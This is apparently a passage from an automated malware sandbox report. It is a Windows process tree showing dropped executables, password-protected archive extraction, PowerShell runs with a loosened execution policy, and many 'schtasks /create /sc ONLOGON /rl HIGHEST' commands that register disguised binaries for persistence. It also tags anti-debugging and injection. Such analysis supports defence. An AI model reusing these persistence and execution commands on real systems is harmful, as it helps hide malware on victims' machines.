              C:\Program Files (x86)\lighteningplayer\data_load.exe  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVs6mDmdY1wodMZO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
              C:\Program Files (x86)\lighteningplayer\data_load.exe  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKWTDtkOpwTbA5mS -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                - Drops file in Program Files directory
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\rundll32.exe  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS
                C:\Windows\system32\rundll32.exe  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS
                  - Drops file in System32 directory
                  - Drops file in Windows directory
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
  C:\Users\Admin\Pictures\Adobe Films\XQXdH_5JuxvMmlvSZF2UGNpF.exe  "C:\Users\Admin\Pictures\Adobe Films\XQXdH_5JuxvMmlvSZF2UGNpF.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\6780841.exe  "C:\Users\Admin\AppData\Roaming\6780841.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\6035907.exe  "C:\Users\Admin\AppData\Roaming\6035907.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\1380456.exe  "C:\Users\Admin\AppData\Roaming\1380456.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
    C:\Users\Admin\AppData\Roaming\8292732.exe  "C:\Users\Admin\AppData\Roaming\8292732.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
    C:\Users\Admin\AppData\Roaming\5077839.exe  "C:\Users\Admin\AppData\Roaming\5077839.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\8225910.exe  "C:\Users\Admin\AppData\Roaming\8225910.exe"
      - Executes dropped EXE
  C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe  "C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
        - Loads dropped DLL
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff8e4fcdec0,0x7ff8e4fcded0,0x7ff8e4fcdee0
          - Loads dropped DLL
          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6f6df9e70,0x7ff6f6df9e80,0x7ff6f6df9e90
            - Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1888 -ip 1888
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2840 -ip 2840
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2744 -ip 2744
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2912 -ip 2912
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3324 -ip 3324
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1320 -ip 1320
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1656 -ip 1656
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3004 -ip 3004
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\1435.exe  C:\Users\Admin\AppData\Local\Temp\1435.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Local\Temp\1435.exe  C:\Users\Admin\AppData\Local\Temp\1435.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\dot3gpui\conhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxSignature\StartMenuExperienceHost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDINBE2\cmd.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\rundll32.exe  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 452
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4964 -ip 4964
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\808C.exe  C:\Users\Admin\AppData\Local\Temp\808C.exe
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\AppData\Local\Temp\981C.exe  C:\Users\Admin\AppData\Local\Temp\981C.exe
  C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 256
    - Program crash
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5720 -ip 5720
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\ABB5.exe  C:\Users\Admin\AppData\Local\Temp\ABB5.exe
C:\Users\Admin\AppData\Local\Temp\E7C5.exe  C:\Users\Admin\AppData\Local\Temp\E7C5.exe
  - Suspicious use of SetThreadContext
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 296
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\msdxm\winlogon.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "foldershare" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\QVDBDFUGTJ\foldershare\foldershare.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3964 -ip 3964
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\qcap\fontdrvhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Pictures\WmiPrvSE.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 13216 -ip 13216
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2464 -ip 2464
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4288 -ip 4288
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\msiexec.exe  C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  C:\Windows\syswow64\MsiExec.exe  C:\Windows\syswow64\MsiExec.exe -Embedding 4539CBB375BD2D09A0AF7D566BA4C7F0 C
    - Loads dropped DLL
  C:\Windows\syswow64\MsiExec.exe  C:\Windows\syswow64\MsiExec.exe -Embedding C43FEF25E97FB51D2969C81CC3FDC8A7
    - Blocklisted process makes network request
    - Loads dropped DLL
    C:\Windows\SysWOW64\taskkill.exe  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
      - Kills process with taskkill
  C:\Windows\syswow64\MsiExec.exe  C:\Windows\syswow64\MsiExec.exe -Embedding 2DB9DF9AEE9B82D6FDA8DC8B860651FC E Global\MSI0000
    - Loads dropped DLL
    - Drops file in Windows directory
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4120 -ip 4120
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exe  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 448
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6264 -ip 6264
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exe  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 456
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7584 -ip 7584
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\CompPkgSrv.exe  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\CoreUIComponents\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\winlogon.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe  schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sppsvc.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in Windows directory
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in Windows directory
C:\Windows\system32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\elevation_service.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\elevation_service.exe"
  - Drops file in Program Files directory
  C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\msedgerecovery.exe  "C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\msedgerecovery.exe" --appguid={56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} --browser-version=92.0.902.62 --sessionid={572948a2-44ef-4729-a1a2-95f61fa8ce9e} --system
    C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\MicrosoftEdgeUpdateSetup.exe  "C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\MicrosoftEdgeUpdateSetup.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent
      - Drops file in Program Files directory
      C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\MicrosoftEdgeUpdate.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
          - Modifies registry class
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
          - Modifies registry class
          C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
            - Modifies registry class
          C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
            - Modifies registry class
          C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
            - Modifies registry class
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping …-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMjIwMDAuMTAwIiBzcD0iIiBhcmNoPSJ4NjQiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSJEQURZIiBwcm9kdWN0X25hbWU9IlN0YW5kYXJkIFBDIChRMzUgKyBJQ0g5LCAyMDA5KSIvPjxleHAgZXRhZz0iJnF1b3Q7cjQ1MnQxK2syVGdxL0hYemp2Rk5CUmhvcEJXUjlzYmpYeHFlVURIOXVYMD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjE1MS4yNyIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSI3NDciLz48L2FwcD48L3JlcXVlc3Q-
    C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /machine /installsource chromerecovery
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
  C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
    C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource core
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
  - Modifies data under HKEY_USERS
  C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F7299C4A-FD47-4453-B9F5-B8D9266CC335}\MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F7299C4A-FD47-4453-B9F5-B8D9266CC335}\MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe" /update /sessionid "{BF2FF194-866B-4E3D-9496-D3E0DEB07D62}"
    - Drops file in Program Files directory
    C:\Program Files (x86)\Microsoft\Temp\EU971D.tmp\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\Temp\EU971D.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{BF2FF194-866B-4E3D-9496-D3E0DEB07D62}"
      C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
        - Modifies registry class
      C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
        - Modifies registry class
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"
          - Modifies registry class
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"
          - Modifies registry class
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"
          - Modifies registry class
      C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping …-…-
  C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping …-…-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-…-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHNvdXJjZV91cmxfaW5kZXg9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxwaW5nIHI9Ijc5IiByZD0iNTMyOSIgcGluZ19mcmVzaG5lc3M9IntCQkVDNDVDQS1BNkNBLTRBMzYtOTg0RS00NUU4QjY1NEMxRjF9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkyLjAuOTAyLjYyIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgbGFzdF9sYXVuY2hfdGltZT0iMTMyNzkzOTM2NTYxNTY4NzUiPjx1cGRhdGVjaGVjay8-PHBpbmcgYWN0aXZlPSIxIiBhPSI4OCIgcj0iNzkiIGFkPSI1MzIwIiByZD0iNTMyOSIgcGluZ19mcmVzaG5lc3M9InswNkI3ODg4QS1DNzAxLTQyQzItOTlEQS01RkZGOEU0NTQ3MTR9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjkyLjAuOTAyLjYyIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgY29ob3J0PSJycmZAMC40MiIgbGFzdF9sYXVuY2hfdGltZT0iMTMyNzE3NDU5MTUwODk1NjIiPjx1cGRhdGVjaGVjay8-PHBpbmcgYWN0aXZlPSIwIiByPSI3OSIgcmQ9IjUzMjkiIHBpbmdfZnJlc2huZXNzPSJ7RTg2NURDQzEtQkQyNS00Mjg2LTg2RTUtMTcxQzY3NjI5MjBFfSIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
  C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
    C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource core
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
  - Modifies data under HKEY_USERS
  C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{1C213309-5CDC-4025-A6EC-528FC3FCEEE3}\MicrosoftEdge_X64_94.0.992.50.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{1C213309-5CDC-4025-A6EC-528FC3FCEEE3}\MicrosoftEdge_X64_94.0.992.50.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
    C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{1C213309-5CDC-4025-A6EC-528FC3FCEEE3}\EDGEMITMP_E1829.tmp\setup.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{1C213309-5CDC-4025-A6EC-528FC3FCEEE3}\EDGEMITMP_E1829.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{1C213309-5CDC-4025-A6EC-528FC3FCEEE3}\EDGEMITMP_E1829.tmp\MSEDGE.PACKED.7Z" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
      - Adds Run key to start application
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Modifies Internet Explorer settings
      - Modifies data under HKEY_USERS
      - Modifies registry class
      - System policy modification
  C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{528C72E1-A829-462C-9B13-5FC18B3158E0}\MicrosoftEdge_X64_94.0.992.50.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{528C72E1-A829-462C-9B13-5FC18B3158E0}\MicrosoftEdge_X64_94.0.992.50.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
